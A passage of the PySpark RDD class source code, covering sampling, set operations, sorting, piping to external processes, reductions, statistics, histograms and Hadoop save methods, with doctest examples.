samples = self.collect() rand.shuffle(samples) return samples maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize)) if num > maxSampleSize: raise ValueError( "Sample size cannot be greater than %d." 
% maxSampleSize) fraction = RDD._computeFractionForSampleSize( num, initialCount, withReplacement) samples = self.sample(withReplacement, fraction, seed).collect() # If the first sample didn't turn out large enough, keep trying to take samples; # this shouldn't happen often because we use a big multiplier for their initial size. # See: scala/spark/RDD.scala while len(samples) < num: # TODO: add log warning for when more than one iteration was run seed = rand.randint(0, sys.maxsize) samples = self.sample(withReplacement, fraction, seed).collect() rand.shuffle(samples) return samples[0:num] @staticmethod def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement): """ Returns a sampling rate that guarantees a sample of size >= sampleSizeLowerBound 99.99% of the time. How the sampling rate is determined: Let p = num / total, where num is the sample size and total is the total number of data points in the RDD. We're trying to compute q > p such that - when sampling with replacement, we're drawing each data point with prob_i ~ Pois(q), where we want to guarantee Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to total), i.e. the failure rate of not having a sufficiently large sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient to guarantee 0.9999 success rate for num > 12, but we need a slightly larger q (9 empirically determined). - when sampling without replacement, we're drawing each data point with prob_i ~ Binomial(total, fraction) and our choice of q guarantees 1-delta, or 0.9999 success rate, where success rate is defined the same as in sampling with replacement. 
""" fraction = float(sampleSizeLowerBound) / total if withReplacement: numStDev = 5 if (sampleSizeLowerBound < 12): numStDev = 9 return fraction + numStDev * sqrt(fraction / total) else: delta = 0.00005 gamma = - log(delta) / total return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction)) def union(self, other): """ Return the union of this RDD and another one. >>> rdd = sc.parallelize([1, 1, 2, 3]) >>> rdd.union(rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if self._jrdd_deserializer == other._jrdd_deserializer: rdd = RDD(self._jrdd.union(other._jrdd), self.ctx, self._jrdd_deserializer) else: # These RDDs contain data in different serialized formats, so we # must normalize them to the default serializer. self_copy = self._reserialize() other_copy = other._reserialize() rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx, self.ctx.serializer) if (self.partitioner == other.partitioner and self.getNumPartitions() == rdd.getNumPartitions()): rdd.partitioner = self.partitioner return rdd def intersection(self, other): """ Return the intersection of this RDD and another one. The output will not contain any duplicate elements, even if the input RDDs did. .. note:: This method performs a shuffle internally. >>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5]) >>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8]) >>> rdd1.intersection(rdd2).collect() [1, 2, 3] """ return self.map(lambda v: (v, None)) \ .cogroup(other.map(lambda v: (v, None))) \ .filter(lambda k_vs: all(k_vs[1])) \ .keys() def _reserialize(self, serializer=None): serializer = serializer or self.ctx.serializer if self._jrdd_deserializer != serializer: self = self.map(lambda x: x, preservesPartitioning=True) self._jrdd_deserializer = serializer return self def __add__(self, other): """ Return the union of this RDD and another one. 
>>> rdd = sc.parallelize([1, 1, 2, 3]) >>> (rdd + rdd).collect() [1, 1, 2, 3, 1, 1, 2, 3] """ if not isinstance(other, RDD): raise TypeError return self.union(other) def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash, ascending=True, keyfunc=lambda x: x): """ Repartition the RDD according to the given partitioner and, within each resulting partition, sort records by their keys. >>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)]) >>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2) >>> rdd2.glom().collect() [[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m")) serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending))) return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True) def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x): """ Sorts this RDD, which is assumed to consist of (key, value) pairs. 
# noqa >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)] >>> sc.parallelize(tmp).sortByKey().first() ('1', 3) >>> sc.parallelize(tmp).sortByKey(True, 1).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> sc.parallelize(tmp).sortByKey(True, 2).collect() [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)] >>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)] >>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)]) >>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect() [('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)] """ if numPartitions is None: numPartitions = self._defaultReducePartitions() memory = self._memory_limit() serializer = self._jrdd_deserializer def sortPartition(iterator): sort = ExternalSorter(memory * 0.9, serializer).sorted return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending))) if numPartitions == 1: if self.getNumPartitions() > 1: self = self.coalesce(1) return self.mapPartitions(sortPartition, True) # first compute the boundary of each part via sampling: we want to partition # the key-space into bins such that the bins have roughly the same # number of (key, value) pairs falling into them rddSize = self.count() if not rddSize: return self # empty RDD maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner fraction = min(maxSampleSize / max(rddSize, 1), 1.0) samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect() samples = sorted(samples, key=keyfunc) # we have numPartitions many parts but one of the them has # an implicit boundary bounds = [samples[int(len(samples) * (i + 1) / numPartitions)] for i in range(0, numPartitions - 1)] def rangePartitioner(k): p = bisect.bisect_left(bounds, keyfunc(k)) if ascending: return p else: return numPartitions - 1 - p return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True) def sortBy(self, 
               keyfunc, ascending=True, numPartitions=None):
        """
        Sorts this RDD by the given keyfunc

        >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
        >>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
        [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
        >>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
        [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
        """
        # Key each element, sort by that key, then drop the key again.
        return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()

    def glom(self):
        """
        Return an RDD created by coalescing all elements within each partition
        into a list.

        >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
        >>> sorted(rdd.glom().collect())
        [[1, 2], [3, 4]]
        """
        def func(iterator):
            yield list(iterator)
        return self.mapPartitions(func)

    def cartesian(self, other):
        """
        Return the Cartesian product of this RDD and another one, that is, the
        RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
        C{b} is in C{other}.

        >>> rdd = sc.parallelize([1, 2])
        >>> sorted(rdd.cartesian(rdd).collect())
        [(1, 1), (1, 2), (2, 1), (2, 2)]
        """
        # Due to batching, we can't use the Java cartesian method.
        deserializer = CartesianDeserializer(self._jrdd_deserializer,
                                             other._jrdd_deserializer)
        return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)

    def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
        """
        Return an RDD of grouped items.

        >>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
        >>> result = rdd.groupBy(lambda x: x % 2).collect()
        >>> sorted([(x, sorted(y)) for (x, y) in result])
        [(0, [2, 8]), (1, [1, 1, 3, 5])]
        """
        return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)

    @ignore_unicode_prefix
    def pipe(self, command, env=None, checkCode=False):
        """
        Return an RDD created by piping elements to a forked external process.

        >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
        [u'1', u'2', u'', u'3']

        :param checkCode: whether or not to check the return value of the shell command.
        """
        if env is None:
            env = dict()

        def func(iterator):
            pipe = Popen(
                shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)

            def pipe_objs(out):
                # Feed elements to the child's stdin on a background thread
                # so we can stream its stdout concurrently.
                for obj in iterator:
                    s = str(obj).rstrip('\n') + '\n'
                    out.write(s.encode('utf-8'))
                out.close()
            Thread(target=pipe_objs, args=[pipe.stdin]).start()

            def check_return_code():
                # Empty generator: chained after stdout so the exit-code
                # check runs only once the child's output is exhausted.
                pipe.wait()
                if checkCode and pipe.returncode:
                    raise Exception("Pipe function `%s' exited "
                                    "with error code %d" % (command, pipe.returncode))
                else:
                    for i in range(0):
                        yield i
            return (x.rstrip(b'\n').decode('utf-8') for x in
                    chain(iter(pipe.stdout.readline, b''), check_return_code()))
        return self.mapPartitions(func)

    def foreach(self, f):
        """
        Applies a function to all elements of this RDD.

        >>> def f(x): print(x)
        >>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
        """
        def processPartition(iterator):
            for x in iterator:
                f(x)
            return iter([])
        self.mapPartitions(processPartition).count()  # Force evaluation

    def foreachPartition(self, f):
        """
        Applies a function to each partition of this RDD.

        >>> def f(iterator):
        ...     for x in iterator:
        ...         print(x)
        >>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
        """
        def func(it):
            r = f(it)
            try:
                # If f returned an iterable, drain it so side effects run.
                return iter(r)
            except TypeError:
                return iter([])
        self.mapPartitions(func).count()  # Force evaluation

    def collect(self):
        """
        Return a list that contains all of the elements in this RDD.

        .. note:: This method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.
        """
        with SCCallSiteSync(self.context) as css:
            port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
        return list(_load_from_socket(port, self._jrdd_deserializer))

    def reduce(self, f):
        """
        Reduces the elements of this RDD using the specified commutative and
        associative binary operator. Currently reduces partitions locally.
        >>> from operator import add
        >>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
        15
        >>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
        10
        >>> sc.parallelize([]).reduce(add)
        Traceback (most recent call last):
            ...
        ValueError: Can not reduce() empty RDD
        """
        def func(iterator):
            iterator = iter(iterator)
            try:
                initial = next(iterator)
            except StopIteration:
                # Empty partition: yield nothing rather than a bogus value.
                return
            yield reduce(f, iterator, initial)

        vals = self.mapPartitions(func).collect()
        if vals:
            return reduce(f, vals)
        raise ValueError("Can not reduce() empty RDD")

    def treeReduce(self, f, depth=2):
        """
        Reduces the elements of this RDD in a multi-level tree pattern.

        :param depth: suggested depth of the tree (default: 2)

        >>> add = lambda x, y: x + y
        >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
        >>> rdd.treeReduce(add)
        -5
        >>> rdd.treeReduce(add, 1)
        -5
        >>> rdd.treeReduce(add, 2)
        -5
        >>> rdd.treeReduce(add, 5)
        -5
        >>> rdd.treeReduce(add, 10)
        -5
        """
        if depth < 1:
            raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)

        # Use the second entry to indicate whether this is a dummy value.
        zeroValue = None, True

        def op(x, y):
            # Skip dummy (empty-partition) entries when combining.
            if x[1]:
                return y
            elif y[1]:
                return x
            else:
                return f(x[0], y[0]), False

        reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
        if reduced[1]:
            raise ValueError("Cannot reduce empty RDD.")
        return reduced[0]

    def fold(self, zeroValue, op):
        """
        Aggregate the elements of each partition, and then the results for all
        the partitions, using a given associative function and a neutral "zero value."

        The function C{op(t1, t2)} is allowed to modify C{t1} and return it
        as its result value to avoid object allocation; however, it should not
        modify C{t2}.

        This behaves somewhat differently from fold operations implemented
        for non-distributed collections in functional languages like Scala.
        This fold operation may be applied to partitions individually, and then
        fold those results into the final result, rather than apply the fold
        to each element sequentially in some defined ordering. For functions
        that are not commutative, the result may differ from that of a fold
        applied to a non-distributed collection.

        >>> from operator import add
        >>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
        15
        """
        def func(iterator):
            acc = zeroValue
            for obj in iterator:
                acc = op(acc, obj)
            yield acc
        # collecting result of mapPartitions here ensures that the copy of
        # zeroValue provided to each partition is unique from the one provided
        # to the final reduce call
        vals = self.mapPartitions(func).collect()
        return reduce(op, vals, zeroValue)

    def aggregate(self, zeroValue, seqOp, combOp):
        """
        Aggregate the elements of each partition, and then the results for all
        the partitions, using a given combine functions and a neutral "zero
        value."

        The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
        as its result value to avoid object allocation; however, it should not
        modify C{t2}.

        The first function (seqOp) can return a different result type, U, than
        the type of this RDD. Thus, we need one operation for merging a T into
        an U and one operation for merging two U

        >>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
        >>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
        >>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
        (10, 4)
        >>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
        (0, 0)
        """
        def func(iterator):
            acc = zeroValue
            for obj in iterator:
                acc = seqOp(acc, obj)
            yield acc
        # collecting result of mapPartitions here ensures that the copy of
        # zeroValue provided to each partition is unique from the one provided
        # to the final reduce call
        vals = self.mapPartitions(func).collect()
        return reduce(combOp, vals, zeroValue)

    def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
        """
        Aggregates the elements of this RDD in a multi-level tree
        pattern.
        :param depth: suggested depth of the tree (default: 2)

        >>> add = lambda x, y: x + y
        >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
        >>> rdd.treeAggregate(0, add, add)
        -5
        >>> rdd.treeAggregate(0, add, add, 1)
        -5
        >>> rdd.treeAggregate(0, add, add, 2)
        -5
        >>> rdd.treeAggregate(0, add, add, 5)
        -5
        >>> rdd.treeAggregate(0, add, add, 10)
        -5
        """
        if depth < 1:
            raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)

        if self.getNumPartitions() == 0:
            return zeroValue

        def aggregatePartition(iterator):
            acc = zeroValue
            for obj in iterator:
                acc = seqOp(acc, obj)
            yield acc

        partiallyAggregated = self.mapPartitions(aggregatePartition)
        numPartitions = partiallyAggregated.getNumPartitions()
        # Fan-in per tree level, derived from the requested depth.
        scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
        # If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
        # aggregation.
        while numPartitions > scale + numPartitions / scale:
            numPartitions /= scale
            curNumPartitions = int(numPartitions)

            def mapPartition(i, iterator):
                for obj in iterator:
                    yield (i % curNumPartitions, obj)

            partiallyAggregated = partiallyAggregated \
                .mapPartitionsWithIndex(mapPartition) \
                .reduceByKey(combOp, curNumPartitions) \
                .values()

        return partiallyAggregated.reduce(combOp)

    def max(self, key=None):
        """
        Find the maximum item in this RDD.

        :param key: A function used to generate key for comparing

        >>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
        >>> rdd.max()
        43.0
        >>> rdd.max(key=str)
        5.0
        """
        if key is None:
            return self.reduce(max)
        return self.reduce(lambda a, b: max(a, b, key=key))

    def min(self, key=None):
        """
        Find the minimum item in this RDD.

        :param key: A function used to generate key for comparing

        >>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
        >>> rdd.min()
        2.0
        >>> rdd.min(key=str)
        10.0
        """
        if key is None:
            return self.reduce(min)
        return self.reduce(lambda a, b: min(a, b, key=key))

    def sum(self):
        """
        Add up the elements in this RDD.

        >>> sc.parallelize([1.0, 2.0, 3.0]).sum()
        6.0
        """
        # Sum each partition locally, then fold the per-partition sums.
        return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)

    def count(self):
        """
        Return the number of elements in this RDD.

        >>> sc.parallelize([2, 3, 4]).count()
        3
        """
        return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()

    def stats(self):
        """
        Return a L{StatCounter} object that captures the mean, variance
        and count of the RDD's elements in one operation.
        """
        def redFunc(left_counter, right_counter):
            return left_counter.mergeStats(right_counter)

        return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)

    def histogram(self, buckets):
        """
        Compute a histogram using the provided buckets. The buckets
        are all open to the right except for the last which is closed.
        e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
        and 50 we would have a histogram of 1,0,1.

        If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) inseration to O(1) per
        element (where n is the number of buckets).

        Buckets must be sorted, not contain any duplicates, and have
        at least two elements.

        If `buckets` is a number, it will generate buckets which are
        evenly spaced between the minimum and maximum of the RDD. For
        example, if the min value is 0 and the max is 100, given `buckets`
        as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
        be at least 1. An exception is raised if the RDD contains infinity.
        If the elements in the RDD do not vary (max == min), a single bucket
        will be used.

        The return value is a tuple of buckets and histogram.
        >>> rdd = sc.parallelize(range(51))
        >>> rdd.histogram(2)
        ([0, 25, 50], [25, 26])
        >>> rdd.histogram([0, 5, 25, 50])
        ([0, 5, 25, 50], [5, 20, 26])
        >>> rdd.histogram([0, 15, 30, 45, 60])  # evenly spaced buckets
        ([0, 15, 30, 45, 60], [15, 15, 15, 6])
        >>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
        >>> rdd.histogram(("a", "b", "c"))
        (('a', 'b', 'c'), [2, 2])
        """

        if isinstance(buckets, int):
            if buckets < 1:
                raise ValueError("number of buckets must be >= 1")

            # filter out non-comparable elements
            def comparable(x):
                if x is None:
                    return False
                if type(x) is float and isnan(x):
                    return False
                return True

            filtered = self.filter(comparable)

            # faster than stats()
            def minmax(a, b):
                return min(a[0], b[0]), max(a[1], b[1])
            try:
                minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
            except TypeError as e:
                if " empty " in str(e):
                    raise ValueError("can not generate buckets from empty RDD")
                raise

            if minv == maxv or buckets == 1:
                return [minv, maxv], [filtered.count()]

            try:
                inc = (maxv - minv) / buckets
            except TypeError:
                raise TypeError("Can not generate buckets with non-number in RDD")

            if isinf(inc):
                raise ValueError("Can not generate buckets with infinite value")

            # keep them as integer if possible
            inc = int(inc)
            if inc * buckets != maxv - minv:
                inc = (maxv - minv) * 1.0 / buckets

            buckets = [i * inc + minv for i in range(buckets)]
            buckets.append(maxv)  # fix accumulated error
            even = True

        elif isinstance(buckets, (list, tuple)):
            if len(buckets) < 2:
                raise ValueError("buckets should have more than one value")

            if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
                raise ValueError("can not have None or NaN in buckets")

            if sorted(buckets) != list(buckets):
                raise ValueError("buckets should be sorted")

            if len(set(buckets)) != len(buckets):
                raise ValueError("buckets should not contain duplicated values")

            minv = buckets[0]
            maxv = buckets[-1]
            even = False
            inc = None
            try:
                steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
            except TypeError:
                pass  # objects in buckets do not support '-'
            else:
                if max(steps) - min(steps) < 1e-10:  # handle precision errors
                    even = True
                    inc = (maxv - minv) / (len(buckets) - 1)

        else:
            raise TypeError("buckets should be a list or tuple or number(int or long)")

        def histogram(iterator):
            counters = [0] * len(buckets)
            for i in iterator:
                if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
                    continue
                # O(1) index for even buckets, O(log n) bisect otherwise.
                t = (int((i - minv) / inc) if even
                     else bisect.bisect_right(buckets, i) - 1)
                counters[t] += 1
            # add last two together
            last = counters.pop()
            counters[-1] += last
            return [counters]

        def mergeCounters(a, b):
            return [i + j for i, j in zip(a, b)]

        return buckets, self.mapPartitions(histogram).reduce(mergeCounters)

    def mean(self):
        """
        Compute the mean of this RDD's elements.

        >>> sc.parallelize([1, 2, 3]).mean()
        2.0
        """
        return self.stats().mean()

    def variance(self):
        """
        Compute the variance of this RDD's elements.

        >>> sc.parallelize([1, 2, 3]).variance()
        0.666...
        """
        return self.stats().variance()

    def stdev(self):
        """
        Compute the standard deviation of this RDD's elements.

        >>> sc.parallelize([1, 2, 3]).stdev()
        0.816...
        """
        return self.stats().stdev()

    def sampleStdev(self):
        """
        Compute the sample standard deviation of this RDD's elements (which
        corrects for bias in estimating the standard deviation by dividing by
        N-1 instead of N).

        >>> sc.parallelize([1, 2, 3]).sampleStdev()
        1.0
        """
        return self.stats().sampleStdev()

    def sampleVariance(self):
        """
        Compute the sample variance of this RDD's elements (which corrects
        for bias in estimating the variance by dividing by N-1 instead of N).

        >>> sc.parallelize([1, 2, 3]).sampleVariance()
        1.0
        """
        return self.stats().sampleVariance()

    def countByValue(self):
        """
        Return the count of each unique value in this RDD as a dictionary of
        (value, count) pairs.
        >>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
        [(1, 2), (2, 3)]
        """
        def countPartition(iterator):
            # Per-partition value -> count map.
            counts = defaultdict(int)
            for obj in iterator:
                counts[obj] += 1
            yield counts

        def mergeMaps(m1, m2):
            for k, v in m2.items():
                m1[k] += v
            return m1
        return self.mapPartitions(countPartition).reduce(mergeMaps)

    def top(self, num, key=None):
        """
        Get the top N elements from an RDD.

        .. note:: This method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.

        .. note:: It returns the list sorted in descending order.

        >>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
        [12]
        >>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
        [6, 5]
        >>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
        [4, 3, 2]
        """
        def topIterator(iterator):
            yield heapq.nlargest(num, iterator, key=key)

        def merge(a, b):
            return heapq.nlargest(num, a + b, key=key)

        return self.mapPartitions(topIterator).reduce(merge)

    def takeOrdered(self, num, key=None):
        """
        Get the N elements from an RDD ordered in ascending order or as
        specified by the optional key function.

        .. note:: this method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.

        >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
        [1, 2, 3, 4, 5, 6]
        >>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
        [10, 9, 7, 6, 5, 4]
        """
        def merge(a, b):
            return heapq.nsmallest(num, a + b, key)

        return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)

    def take(self, num):
        """
        Take the first num elements of the RDD.

        It works by first scanning one partition, and use the results from
        that partition to estimate the number of additional partitions needed
        to satisfy the limit.

        Translated from the Scala implementation in RDD#take().

        .. note:: this method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.

        >>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
        [2, 3]
        >>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
        [2, 3, 4, 5, 6]
        >>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
        [91, 92, 93]
        """
        items = []
        totalParts = self.getNumPartitions()
        partsScanned = 0

        while len(items) < num and partsScanned < totalParts:
            # The number of partitions to try in this iteration.
            # It is ok for this number to be greater than totalParts because
            # we actually cap it at totalParts in runJob.
            numPartsToTry = 1
            if partsScanned > 0:
                # If we didn't find any rows after the previous iteration,
                # quadruple and retry.  Otherwise, interpolate the number of
                # partitions we need to try, but overestimate it by 50%.
                # We also cap the estimation in the end.
                if len(items) == 0:
                    numPartsToTry = partsScanned * 4
                else:
                    # the first paramter of max is >=1 whenever partsScanned >= 2
                    numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
                    numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)

            left = num - len(items)

            def takeUpToNumLeft(iterator):
                iterator = iter(iterator)
                taken = 0
                while taken < left:
                    yield next(iterator)
                    taken += 1

            p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
            res = self.context.runJob(self, takeUpToNumLeft, p)

            items += res
            partsScanned += numPartsToTry

        return items[:num]

    def first(self):
        """
        Return the first element in this RDD.

        >>> sc.parallelize([2, 3, 4]).first()
        2
        >>> sc.parallelize([]).first()
        Traceback (most recent call last):
            ...
        ValueError: RDD is empty
        """
        rs = self.take(1)
        if rs:
            return rs[0]
        raise ValueError("RDD is empty")

    def isEmpty(self):
        """
        Returns true if and only if the RDD contains no elements at all.

        .. note:: an RDD may be empty even when it has at least 1 partition.
        >>> sc.parallelize([]).isEmpty()
        True
        >>> sc.parallelize([1]).isEmpty()
        False
        """
        # Cheap check on partition count first; otherwise probe one element.
        return self.getNumPartitions() == 0 or len(self.take(1)) == 0

    def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
        """
        Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
        system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
        converted for output using either user specified converters or, by default,
        L{org.apache.spark.api.python.JavaToWritableConverter}.

        :param conf: Hadoop job configuration, passed in as a dict
        :param keyConverter: (None by default)
        :param valueConverter: (None by default)
        """
        jconf = self.ctx._dictToJavaMap(conf)
        pickledRDD = self._pickled()
        # Trailing True selects the new (mapreduce) Hadoop API on the JVM side.
        self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
                                                    keyConverter, valueConverter, True)

    def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
                               keyConverter=None, valueConverter=None, conf=None):
        """
        Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
        system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
        will be inferred if not specified. Keys and values are converted for output using either
        user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
        C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
        of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.

        :param path: path to Hadoop file
        :param outputFormatClass: fully qualified classname of Hadoop OutputFormat
               (e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
        :param keyClass: fully qualified classname of key Writable class
               (e.g. "org.apache.hadoop.io.IntWritable", None by default)
        :param valueClass: fully qualified classname of value Writable class
               (e.g. "org.apache.hadoop.io.Text", None by default)
        :param keyConverter: (None by default)
        :param valueConverter: (None by default)
        :param conf: Hadoop job configuration, passed in as a dict (None by default)
        """
        jconf = self.ctx._dictToJavaMap(conf)
        pickledRDD = self._pickled()
        self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(
            pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass,
            keyConverter, valueConverter, jconf)

    def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
        """
        Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
        system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
        converted for output using either user specified converters or, by default,
        L{org.apache.spark.api.python.JavaToWritableConverter}.

        :param conf: Hadoop job configuration, passed in as a dict
        :param keyConverter: (None by default)
        :param valueConverter: (None by default)
        """
        jconf = self.ctx._dictToJavaMap(conf)
        pickledRDD = self._pickled()
        # Trailing False selects the old (mapred) Hadoop API on the JVM side.
        self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
                                                    keyConverter, valueConverter, False)

    def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
                         keyConverter=None, valueConverter=None, conf=None,
                         compressionCodecClass=None):
        """
        Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
        system, using the old Hadoop OutputFormat API (mapred package). Key and value types
        will be inferred if not specified. Keys and values are converted for output using either
        user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
        C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
        of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.

        :param path: path to Hadoop file
        :param outputFormatClass: fully qualified classname of Hadoop OutputFormat
               (e.g.
               "org.apache.hadoop.mapred.SequenceFileOutputFormat")
        :param keyClass: fully qualified classname of key Writable class
               (e.g. "org.apache.hadoop.io.IntWritable", None by default)
        :param valueClass: fully qualified classname of value Writable class
               (e.g. "org.apache.hadoop.io.Text", None by default)
        :param keyConverter: (None by default)
        :param valueConverter: (None by default)
        :param conf: (None by default)
        :param compressionCodecClass: (None by default)
        """
        jconf = self.ctx._dictToJavaMap(conf)
        pickledRDD = self._pickled()
        self.ctx._jvm.PythonRDD.saveAsHadoopFile(
            pickledRDD._jrdd, True, path, outputFormatClass, keyClass, valueClass,
            keyConverter, valueConverter, jconf, compressionCodecClass)

    def saveAsSequenceFile(self, path, compressionCodecClass=None):
        """
        Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
        system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
        RDD's key and value types. The mechanism is as follows:

            1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
            2. Keys and values of this Java RDD are converted to Writables and written out.

        :param path: path to sequence file
        :param compressionCodecClass: (None by default)
        """
        pickledRDD = self._pickled()
        self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
                                                   path, compressionCodecClass)

    def saveAsPickleFile(self, path, batchSize=10):
        """
        Save this RDD as a SequenceFile of serialized objects. The serializer
        used is L{pyspark.serializers.PickleSerializer}, default batch size
        is 10.

        >>> tmpFile = NamedTemporaryFile(delete=True)
        >>> tmpFile.close()
        >>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
